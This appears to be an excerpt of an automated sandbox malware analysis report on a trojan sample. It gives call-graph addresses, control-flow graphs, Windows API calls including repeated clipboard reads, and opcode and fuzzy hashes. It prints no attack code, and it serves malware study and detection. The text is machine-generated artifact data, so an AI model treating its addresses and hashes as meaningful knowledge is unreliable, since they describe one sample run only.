5b2405a 29729->29730 29731 5b21b6c 2 API calls 29730->29731 29732 5b2406f 29731->29732 29732->29686 29735 5b21b9f 29733->29735 29734 5b243f6 29735->29734 29736 5b24088 SetWindowLongW 29735->29736 29736->29734 29739 5b24f24 29737->29739 29738 5b24fb0 29738->29708 29755 5b24fc8 29739->29755 29759 5b24fb9 29739->29759 29743 5b24ee7 29742->29743 29744 5b24f0e 29742->29744 29743->29708 29746 5b24fc8 2 API calls 29744->29746 29747 5b24fb9 2 API calls 29744->29747 29745 5b24fb0 29745->29708 29746->29745 29747->29745 29749 5b21c9f 29748->29749 29750 5b265f2 29749->29750 29751 5b2669c 29749->29751 29752 5b2664a CallWindowProcW 29750->29752 29754 5b265f9 29750->29754 29753 5b21b6c OleGetClipboard 29751->29753 29752->29754 29753->29754 29754->29708 29756 5b24fd9 29755->29756 29763 5b2ba30 29755->29763 29780 5b2ba40 29755->29780 29756->29738 29760 5b24fd9 29759->29760 29761 5b2ba30 2 API calls 29759->29761 29762 5b2ba40 2 API calls 29759->29762 29760->29738 29761->29760 29762->29760 29764 5b2ba35 29763->29764 29776 5b2ba30 2 API calls 29764->29776 29777 5b2ba40 2 API calls 29764->29777 29797 5b2bd40 29764->29797 29804 5b2bd50 29764->29804 29811 5b2bc96 29764->29811 29765 5b2bad8 29766 5b2bafe 29765->29766 29818 5b94198 29765->29818 29824 5b94189 29765->29824 29766->29756 29767 5b2bb0a 29767->29766 29768 5b2bf9a 29767->29768 29769 5b2bd7c 29767->29769 29831 5b2b710 29768->29831 29771 5b2beb6 29769->29771 29835 5b2c340 29769->29835 29771->29756 29776->29765 29777->29765 29781 5b2ba73 29780->29781 29791 5b2bd50 2 API calls 29781->29791 29792 5b2bd40 2 API calls 29781->29792 29793 5b2ba30 2 API calls 29781->29793 29794 5b2ba40 2 API calls 29781->29794 29795 5b2bc96 2 API calls 29781->29795 29782 5b2bad8 29783 5b2bafe 29782->29783 29789 5b94189 OleGetClipboard 29782->29789 29790 5b94198 OleGetClipboard 29782->29790 29783->29756 29784 5b2bb0a 29784->29783 29785 5b2bf9a 29784->29785 29786 5b2bd7c 29784->29786 29787 5b2b710 2 API calls 29785->29787 29788 5b2beb6 29786->29788 29796 5b2c340 2 API calls 29786->29796 29787->29788 29788->29756 29789->29784 29790->29784 29791->29782 29792->29782 29793->29782 29794->29782 29795->29782 29796->29788 29798 5b2bcfe 29797->29798 29798->29797 29799 5b2bf9a 29798->29799 29800 5b2bd7c 29798->29800 29801 5b2b710 2 API calls 29799->29801 29802 5b2beb6 29800->29802 29803 5b2c340 2 API calls 29800->29803 29801->29802 29802->29765 29803->29802 29805 5b2bd69 29804->29805 29808 5b2bd7c 29804->29808 29807 5b2bf9a 29805->29807 29805->29808 29806 5b2beb6 29806->29765 29809 5b2b710 2 API calls 29807->29809 29808->29806 29810 5b2c340 2 API calls 29808->29810 29809->29806 29810->29806 29812 5b2bb74 29811->29812 29813 5b2bf9a 29812->29813 29814 5b2bd7c 29812->29814 29815 5b2b710 2 API calls 29813->29815 29816 5b2beb6 29814->29816 29817 5b2c340 2 API calls 29814->29817 29815->29816 29816->29765 29817->29816 29820 5b941a0 29818->29820 29819 5b941b4 29819->29767 29820->29819 29840 5b945d1 29820->29840 29851 5b945e0 29820->29851 29821 5b941c9 29821->29767 29825 5b9414b 29824->29825 29827 5b94192 29824->29827 29825->29767 29826 5b941b4 29826->29767 29827->29826 29829 5b945d1 OleGetClipboard 29827->29829 29830 5b945e0 OleGetClipboard 29827->29830 29828 5b941c9 29828->29767 29829->29828 29830->29828 29832 5b2b71b 29831->29832 29833 5b2c340 2 API calls 29832->29833 29834 5b2c556 29832->29834 29833->29834 29834->29771 29836 5b2c352 29835->29836 29837 5b2c34b 29835->29837 29874 5b2c2df 29836->29874 29837->29771 29838 5b2c358 29838->29771 29841 5b945f2 29840->29841 29842 5b9460d 29841->29842 29844 5b94639 29841->29844 29849 5b945d1 OleGetClipboard 29842->29849 29850 5b945e0 OleGetClipboard 29842->29850 29843 5b94613 29843->29821 29846 5b946b9 29844->29846 29862 5b94791 29844->29862 29866 5b947a0 29844->29866 29845 5b946d7 29845->29821 29846->29821 29849->29843 29850->29843 29852 5b945f2 29851->29852 29853 5b9460d 29852->29853 29855 5b94639 29852->29855 29860 5b945d1 OleGetClipboard 29853->29860 29861 5b945e0 OleGetClipboard 29853->29861 29854 5b94613 29854->29821 29857 5b946b9 29855->29857 29858 5b94791 OleGetClipboard 29855->29858 29859 5b947a0 OleGetClipboard 29855->29859 29856 5b946d7 29856->29821 29857->29821 29858->29856 29859->29856 29860->29854 29861->29854 29864 5b947b5 29862->29864 29865 5b947db 29864->29865 29870 5b924cc 29864->29870 29865->29845 29868 5b947b5 29866->29868 29867 5b924cc OleGetClipboard 29867->29868 29868->29867 29869 5b947db 29868->29869 29869->29845 29871 5b94848 OleGetClipboard 29870->29871 29873 5b948e2 29871->29873 29875 5b2c35f 29874->29875 29876 5b2c2ea 29874->29876 29875->29876 29877 5b2c3a0 29875->29877 29878 5b2c37e 29875->29878 29876->29838 29879 5b25980 2 API calls 29877->29879 29882 5b2c38c 29878->29882 29884 5b25980 29878->29884 29880 5b2c3a7 29879->29880 29880->29838 29882->29838 29883 5b2c3c8 29883->29838 29886 5b259cc 29884->29886 29885 5b25c6c 29885->29883 29886->29885 29889 5b2c3d0 29886->29889 29893 5b2c3e0 29886->29893 29890 5b2c426 29889->29890 29891 5b21c94 2 API calls 29890->29891 29892 5b2c449 29890->29892 29891->29892 29892->29885 29894 5b2c426 29893->29894 29895 5b21c94 2 API calls 29894->29895 29896 5b2c449 29894->29896 29895->29896 29896->29885 29429 5b203e8 29430 5b20410 29429->29430 29431 5b20438 29430->29431 29434 5b20480 29430->29434 29441 5b20498 29430->29441 29431->29431 29435 5b204a7 29434->29435 29448 5b215b0 29435->29448 29454 5b215a0 29435->29454 29436 5b204d0 29460 5b22208 29436->29460 29442 5b204a7 29441->29442 29445 5b215b0 3 API calls 29442->29445 29446 5b215a0 3 API calls 29442->29446 29443 5b204d0 29447 5b22208 CreateWindowExW 29443->29447 29444 5b204e1 29444->29431 29445->29443 29446->29443 29447->29444 29450 5b215cc 29448->29450 29449 5b2161c 29449->29436 29451 5b21621 29450->29451 29466 5b216b0 29450->29466 29473 5b216c0 29450->29473 29451->29436 29455 5b215b0 29454->29455 29457 5b21621 29455->29457 29458 5b216b0 2 API calls 29455->29458 29459 5b216c0 2 API calls 29455->29459 29456 5b2161c 29456->29436 29457->29436 29458->29456 29459->29456 29462 5b22239 29460->29462 29463 5b2233a 29460->29463 29461 5b204e1 29461->29431 29462->29461 29499 5b22f27 29462->29499 29504 5b22f38 29462->29504 29467 5b216c0 29466->29467 29468 5b21818 KiUserCallbackDispatcher 29467->29468 29470 5b216e5 29467->29470 29480 5b90ad8 29467->29480 29485 5b90ac9 29467->29485 29468->29470 29470->29449 29475 5b216c2 29473->29475 29474 5b216e5 29474->29449 29475->29474 29476 5b21818 KiUserCallbackDispatcher 29475->29476 29478 5b90ac9 SetWindowLongW 29475->29478 29479 5b90ad8 SetWindowLongW 29475->29479 29476->29474 29478->29476 29479->29476 29481 5b90ae8 29480->29481 29490 5b24077 29481->29490 29493 5b24088 29481->29493 29482 5b90afa 29482->29468 29486 5b90ad8 29485->29486 29488 5b24077 SetWindowLongW 29486->29488 29489 5b24088 SetWindowLongW 29486->29489 29487 5b90afa 29487->29468 29488->29487 29489->29487 29491 5b240a0 29490->29491 29496 5b21b7c 29490->29496 29491->29482 29494 5b21b7c SetWindowLongW 29493->29494 29495 5b240a0 29494->29495 29495->29482 29497 5b240b8 SetWindowLongW 29496->29497 29498 5b24124 29497->29498 29498->29491 29501 5b22f63 29499->29501 29500 5b23012 29500->29500 29501->29500 29509 5b23d10 29501->29509 29513 5b23e20 29501->29513 29505 5b22f63 29504->29505 29506 5b23012 29505->29506 29507 5b23d10 CreateWindowExW 29505->29507 29508 5b23e20 CreateWindowExW 29505->29508 29507->29506 29508->29506 29510 5b23d92 29509->29510 29516 5b21b40 29510->29516 29514 5b23e55 29513->29514 29515 5b21b40 CreateWindowExW 29513->29515 29514->29500 29515->29514 29517 5b23e70 CreateWindowExW 29516->29517 29519 5b23f94 29517->29519 29519->29519 29897 5b26718 29898 5b26728 29897->29898 29903 5b2d520 29898->29903 29912 5b2d478 29898->29912 29918 5b2d46a 29898->29918 29899 5b26751 29904 5b2d523 SetWindowTextW 29903->29904 29905 5b2d4d6 29903->29905 29907 5b2d5a1 29904->29907 29924 5b27d60 29905->29924 29907->29899 29909 5b2d502 29936 5b2b930 29909->29936 29911 5b2d509 29911->29899 29913 5b2d4ad 29912->29913 29914 5b27d60 7 API calls 29913->29914 29915 5b2d502 29914->29915 29916 5b2b930 7 API calls 29915->29916 29917 5b2d509 29916->29917 29917->29899 29919 5b2d478 29918->29919 29920 5b27d60 7 API calls 29919->29920 29921 5b2d502 29920->29921 29922 5b2b930 7 API calls 29921->29922 29923 5b2d509 29922->29923 29923->29899 29928 5b27d8c 29924->29928 29926 5b26890 7 API calls 29927 5b2816c 29926->29927 29927->29909 29934 5b27fc4 29928->29934 29946 5b2798c 29928->29946 29929 5b27e45 29930 5b26890 7 API calls 29929->29930 29935 5b27eed 29929->29935 29931 5b27eb7 29930->29931 29932 5b26890 7 API calls 29931->29932 29932->29935 29933 5b26890 7 API calls 29933->29934 29934->29926 29934->29927 29935->29933 29937 5b2b93b 29936->29937 29938 5b2d767 29937->29938 29939 5b2d72f 29937->29939 29945 5b2d736 29937->29945 29941 5b2d7b8 29938->29941 29942 5b2d78c 29938->29942 29940 5b26890 7 API calls 29939->29940 29940->29945 29944 5b26890 7 API calls 29941->29944 29943 5b26890 7 API calls 29942->29943 29943->29945 29944->29945 29945->29911 29947 5b27997 29946->29947 29948 5b28307 29947->29948 29950 5b26890 7 API calls 29947->29950 29951 5b282c9 29947->29951 29948->29929 29949 5b26890 7 API calls 29949->29951 29950->29951 29951->29948 29951->29949 29966 5b29108 29969 5b28cd8 29966->29969 29968 5b2911f 29970 5b28ce3 29969->29970 29971 5b291d8 29970->29971 29975 5b291f8 29970->29975 29980 5b291e9 29970->29980 29971->29968 29972 5b291a2 29972->29968 29976 5b291fe 29975->29976 29978 5b2943d 29976->29978 29985 5b29659 29976->29985 29978->29972 29981 5b291f6 29980->29981 29983 5b2943d 29981->29983 29984 5b29659 7 API calls 29981->29984 29982 5b29473 29982->29972 29983->29972 29984->29982 29986 5b29668 29985->29986 29987 5b2971e 29986->29987 29988 5b26890 7 API calls 29986->29988 29988->29987 29989 5b2e108 29991 5b2e119 29989->29991 29990 5b2e183 29991->29990 29994 5b2daac 29991->29994 29995 5b2dab7 29994->29995 29996 5b2e17c 29995->29996 29998 5b2f898 29995->29998 30000 5b2f8c2 29998->30000 30004 5b2e41c 29998->30004 30001 5b2f8bf 30000->30001 30002 5b2f8f6 CreateIconFromResourceEx 30000->30002 30001->29996 30003 5b2f976 30002->30003 30003->29996 30005 5b2f8f8 CreateIconFromResourceEx 30004->30005 30006 5b2f976 30005->30006 30006->30000 29421 25bd210 29424 25bd2f7 29421->29424 29422 25bd21f 29425 25bd33c 29424->29425 29426 25bd319 29424->29426 29425->29422 29426->29425 29427 25bd540 GetModuleHandleW 29426->29427 29428 25bd56d 29427->29428 29428->29422 29952 25bf6b0 29953 25bf6f6 29952->29953 29957 25bfc98 29953->29957 29960 25bfc88 29953->29960 29954 25bf7e3 29963 25be080 29957->29963 29961 25bfcc6 29960->29961 29962 25be080 DuplicateHandle 29960->29962 29961->29954 29962->29961 29964 25bfd00 DuplicateHandle 29963->29964 29965 25bfcc6 29964->29965 29965->29954 30007 5b2800c 30008 5b28015 30007->30008 30010 5b28033 30007->30010 30009 5b26890 7 API calls 30008->30009 30008->30010 30009->30010 30011 5b26890 7 API calls 30010->30011 30012 5b2816c 30010->30012 30011->30012

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 751 5b216c0-5b216d9 753 5b216df-5b216e3 751->753 754 5b2175c-5b2175f 751->754 755 5b21760-5b217b6 753->755 756 5b216e5-5b216ff 753->756 773 5b217ba-5b217ce 755->773 774 5b217b8-5b217b9 755->774 761 5b21713-5b21735 756->761 762 5b21701-5b21708 756->762 769 5b2173c-5b2173e 761->769 762->761 764 5b2170a-5b2170c 762->764 764->761 771 5b21740-5b2174c 769->771 772 5b21755 769->772 771->772 776 5b2174e 771->776 772->754 778 5b217d4-5b217fa 773->778 779 5b21888-5b2188d 773->779 774->773 776->772 783 5b2180a-5b2180f 778->783 784 5b217fc-5b21807 778->784 785 5b21811 783->785 786 5b21818-5b21820 783->786 784->783 794 5b21813 call 5b90ac9 785->794 795 5b21813 call 5b90ad8 785->795 787 5b21822-5b2183b 786->787 788 5b21845-5b2187e KiUserCallbackDispatcher 786->788 787->788 792 5b21883 call 5b90ea1 788->792 793 5b21883 call 5b90eb0 788->793 792->779 793->779 794->786 795->786
                                                                                                                                APIs
                                                                                                                                • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,03774164,0281CE70,?,00000000,?,00000000,00000000), ref: 05B21877
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                • String ID: Haq
                                                                                                                                • API String ID: 2492992576-725504367
                                                                                                                                • Opcode ID: 54185b1960d8a57fe402ebac0ccab36e0fb94ade9483e1b28299af751a10c87f
                                                                                                                                • Instruction ID: d4200c12a071ca08fa20dc1520d7cb18845d79d6fb3e0ac81624ea0008643658
                                                                                                                                • Opcode Fuzzy Hash: 54185b1960d8a57fe402ebac0ccab36e0fb94ade9483e1b28299af751a10c87f
                                                                                                                                • Instruction Fuzzy Hash: 84517C34704A119FC719AB28C854B6A77E7FFC5700B1584A9E40ACB7A1CF74ED42CBA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 822 25bd2f7-25bd317 823 25bd319-25bd326 call 25bc604 822->823 824 25bd343-25bd347 822->824 830 25bd328 823->830 831 25bd33c 823->831 826 25bd35b-25bd39c 824->826 827 25bd349-25bd353 824->827 833 25bd3a9-25bd3b7 826->833 834 25bd39e-25bd3a6 826->834 827->826 877 25bd32e call 25bd590 830->877 878 25bd32e call 25bd5a0 830->878 831->824 835 25bd3db-25bd3dd 833->835 836 25bd3b9-25bd3be 833->836 834->833 841 25bd3e0-25bd3e7 835->841 838 25bd3c9 836->838 839 25bd3c0-25bd3c7 call 25bc610 836->839 837 25bd334-25bd336 837->831 840 25bd478-25bd538 837->840 843 25bd3cb-25bd3d9 838->843 839->843 872 25bd53a-25bd53d 840->872 873 25bd540-25bd56b GetModuleHandleW 840->873 844 25bd3e9-25bd3f1 841->844 845 25bd3f4-25bd3fb 841->845 843->841 844->845 846 25bd408-25bd411 call 25bc620 845->846 847 25bd3fd-25bd405 845->847 853 25bd41e-25bd423 846->853 854 25bd413-25bd41b 846->854 847->846 855 25bd441-25bd44e 853->855 856 25bd425-25bd42c 853->856 854->853 863 25bd471-25bd477 855->863 864 25bd450-25bd46e 855->864 856->855 858 25bd42e-25bd43e call 25bc630 call 25bc640 856->858 858->855 864->863 872->873 874 25bd56d-25bd573 873->874 875 25bd574-25bd588 873->875 874->875 877->837 878->837
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 025BD55E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: a5fa6142f2d93ef8c3dbcce7710bb07c086f0b36eb3b95ed174753daef8eafbb
                                                                                                                                • Instruction ID: f22b81aa0fd7a7e9fedb9d80241d568316c85e98aecf48021fb8e0420827884a
                                                                                                                                • Opcode Fuzzy Hash: a5fa6142f2d93ef8c3dbcce7710bb07c086f0b36eb3b95ed174753daef8eafbb
                                                                                                                                • Instruction Fuzzy Hash: FD8144B0A00B058FD725DF29D0507AABBF2FF88304F14892ED48AD7A40D775E94ACB95

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 879 5b23e64-5b23ed6 880 5b23ee1-5b23ee8 879->880 881 5b23ed8-5b23ede 879->881 882 5b23ef3-5b23f2b 880->882 883 5b23eea-5b23ef0 880->883 881->880 884 5b23f33-5b23f92 CreateWindowExW 882->884 883->882 885 5b23f94-5b23f9a 884->885 886 5b23f9b-5b23fd3 884->886 885->886 890 5b23fe0 886->890 891 5b23fd5-5b23fd8 886->891 892 5b23fe1 890->892 891->890 892->892
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B23F82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: 2e93a1538ec0a2498b53e21d135b3d94285e414a7a8337cec91a04d09adb09a5
                                                                                                                                • Instruction ID: 09bd4b95d5d7143159e9f60d875f5badbc98de37117290fc1c9d917c8669b9ee
                                                                                                                                • Opcode Fuzzy Hash: 2e93a1538ec0a2498b53e21d135b3d94285e414a7a8337cec91a04d09adb09a5
                                                                                                                                • Instruction Fuzzy Hash: DA51DFB1C043199FDB14CF9AD884ADEBBF5FF48310F24852AE819AB250D775A885CF90

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 893 5b21b40-5b23ed6 895 5b23ee1-5b23ee8 893->895 896 5b23ed8-5b23ede 893->896 897 5b23ef3-5b23f92 CreateWindowExW 895->897 898 5b23eea-5b23ef0 895->898 896->895 900 5b23f94-5b23f9a 897->900 901 5b23f9b-5b23fd3 897->901 898->897 900->901 905 5b23fe0 901->905 906 5b23fd5-5b23fd8 901->906 907 5b23fe1 905->907 906->905 907->907
                                                                                                                                APIs
                                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05B23F82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 716092398-0
                                                                                                                                • Opcode ID: b2e6d3eb7b62a2d6f12dfd9c42c9b6a91065d2e9f1580be4e956a8821ea223f8
                                                                                                                                • Instruction ID: 842722c8050494ca3ae11c0e115691d72765bfdb76b461a5860490200c4be90d
                                                                                                                                • Opcode Fuzzy Hash: b2e6d3eb7b62a2d6f12dfd9c42c9b6a91065d2e9f1580be4e956a8821ea223f8
                                                                                                                                • Instruction Fuzzy Hash: 7851D0B1D043199FDB14CF9AC884ADEBBF5FF48300F24856AE819AB210D775A845CFA0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 908 5b21c94-5b265ec 911 5b265f2-5b265f7 908->911 912 5b2669c-5b266bc call 5b21b6c 908->912 913 5b2664a-5b26682 CallWindowProcW 911->913 914 5b265f9-5b26630 911->914 919 5b266bf-5b266cc 912->919 916 5b26684-5b2668a 913->916 917 5b2668b-5b2669a 913->917 921 5b26632-5b26638 914->921 922 5b26639-5b26648 914->922 916->917 917->919 921->922 922->919
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05B26671
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: 0f6ba3b7387380d1857371d5576ce86828f011793cba83ffe8c49b6b8350dcb9
                                                                                                                                • Instruction ID: ca78d99be6c9cd95a1b43f219cf43895d0bd7ea2280585bebe98b3d5429064f9
                                                                                                                                • Opcode Fuzzy Hash: 0f6ba3b7387380d1857371d5576ce86828f011793cba83ffe8c49b6b8350dcb9
                                                                                                                                • Instruction Fuzzy Hash: EA414BB9900319CFDB15CF99C448AAABBF6FF88314F24C499D519A7321D735A840CFA4

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 925 5b2f8a8-5b2f8bf call 5b2e41c
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFromIconResource
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3668623891-0
                                                                                                                                • Opcode ID: 91e5d67d60649763ec80b53804895f033a5671d188de69413e818e4fc0536491
                                                                                                                                • Instruction ID: 14065d8db3f2b174cae3e0462fa127d2bc23a04fccd01ebf4d244ef16371c74e
                                                                                                                                • Opcode Fuzzy Hash: 91e5d67d60649763ec80b53804895f033a5671d188de69413e818e4fc0536491
                                                                                                                                • Instruction Fuzzy Hash: 64318B729042589FCB11DFA9C805AEEBFF5EF09310F14809AE558AB261C335E950DFA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 928 5b9483c-5b94898 929 5b948a2-5b948e0 OleGetClipboard 928->929 930 5b948e9-5b948fa 929->930 931 5b948e2-5b948e8 929->931 933 5b94904-5b94937 930->933 931->930 936 5b94939-5b9493d 933->936 937 5b94947 933->937 936->937 938 5b9493f 936->938 939 5b94948 937->939 938->937 939->939
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: 67faae4bc45605030ef3050cae9c28ff9a54e0865e35fd6a4a915746a60fb9a8
                                                                                                                                • Instruction ID: ede0d4c0940284a471f80d9e4b0c68313d8596f59423a179a27a3fd70c18249e
                                                                                                                                • Opcode Fuzzy Hash: 67faae4bc45605030ef3050cae9c28ff9a54e0865e35fd6a4a915746a60fb9a8
                                                                                                                                • Instruction Fuzzy Hash: 7C3101B0901249DFDF14CF99C588BDDBBF6BF48304F248069E404AB394D7B56946CBA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 940 5b2d520-5b2d521 941 5b2d523-5b2d568 940->941 942 5b2d4d6-5b2d504 call 5b27d60 call 5b2b930 940->942 945 5b2d570-5b2d59f SetWindowTextW 941->945 946 5b2d56a-5b2d56d 941->946 955 5b2d509-5b2d510 942->955 949 5b2d5a1-5b2d5a7 945->949 950 5b2d5a8-5b2d5c9 945->950 946->945 949->950
                                                                                                                                APIs
                                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 05B2D592
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4527661748.0000000005B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B20000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b20000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: TextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 530164218-0
                                                                                                                                • Opcode ID: e2af7deae908d40f66cf923394919e3c269b589658167d83828bf10369186d63
                                                                                                                                • Instruction ID: f44fab2a74ce24e8dda12ea48497bf268597e94ef79ce60dbbd5a6cb1e6cccdd
                                                                                                                                • Opcode Fuzzy Hash: e2af7deae908d40f66cf923394919e3c269b589658167d83828bf10369186d63
                                                                                                                                • Instruction Fuzzy Hash: D62146B2D002198FDB14DF9AD845AEEBBF5FF98320F10846AD419A7240D778A546CBA1

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 956 5b924cc-5b948e0 OleGetClipboard 959 5b948e9-5b948fa 956->959 960 5b948e2-5b948e8 956->960 962 5b94904-5b94937 959->962 960->959 965 5b94939-5b9493d 962->965 966 5b94947 962->966 965->966 967 5b9493f 965->967 968 5b94948 966->968 967->966 968->968
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4528405070.0000000005B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_5b90000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Clipboard
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 220874293-0
                                                                                                                                • Opcode ID: b276b0cebe6c942a7def40ed90f652fb924eb38a329d6a3124a6ab71d3f12226
                                                                                                                                • Instruction ID: 6343c891bc8f8bb1c508320dfc1ff6eaa57570952427d3cf67d8212a5b329b8e
                                                                                                                                • Opcode Fuzzy Hash: b276b0cebe6c942a7def40ed90f652fb924eb38a329d6a3124a6ab71d3f12226
                                                                                                                                • Instruction Fuzzy Hash: 0C3101B0901249DFDF14DF99C988BDEBBF6FF48304F2080A9E405AB290D7B46945CBA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 969 25be080-25bfd94 DuplicateHandle 971 25bfd9d-25bfdba 969->971 972 25bfd96-25bfd9c 969->972 972->971
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BFCC6,?,?,?,?,?), ref: 025BFD87
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: 6fe32e314127c6327639bb8f662c1d4aea44523e7da9b00d9997491d2bb52bec
                                                                                                                                • Instruction ID: aa8e698f2ce8603e8b8426a820f39f1ce70a329e8d949129342342acb6084bc3
                                                                                                                                • Opcode Fuzzy Hash: 6fe32e314127c6327639bb8f662c1d4aea44523e7da9b00d9997491d2bb52bec
                                                                                                                                • Instruction Fuzzy Hash: D721E6B59002499FDB10CFAAD984AEEBFF5FF48310F14845AE918A7350D378A940CFA5
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,025BFCC6,?,?,?,?,?), ref: 025BFD87
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000012.00000002.4519580354.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_18_2_25b0000_TrojanAIbot.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: fc8b6e46a2abdc1a386f10631191e434561390d33c823c5f5ab1e856c172e6f5
                                                                                                                                • Instruction ID: 646e28ef5fd174b1b4aa6c34358e40caf123d1dbc781bd55ef1eaca7ead8f135
                                                                                                                                • Opcode Fuzzy Hash: fc8b6e46a2abdc1a386f10631191e434561390d33c823c5f5ab1e856c172e6f5
                                                                                                                                • Instruction Fuzzy Hash: 8E21E3B59002089FDB10CFAAD984AEEBFF5FF48310F14845AE918A7210D378A944CFA5
                                                                                                                                APIs
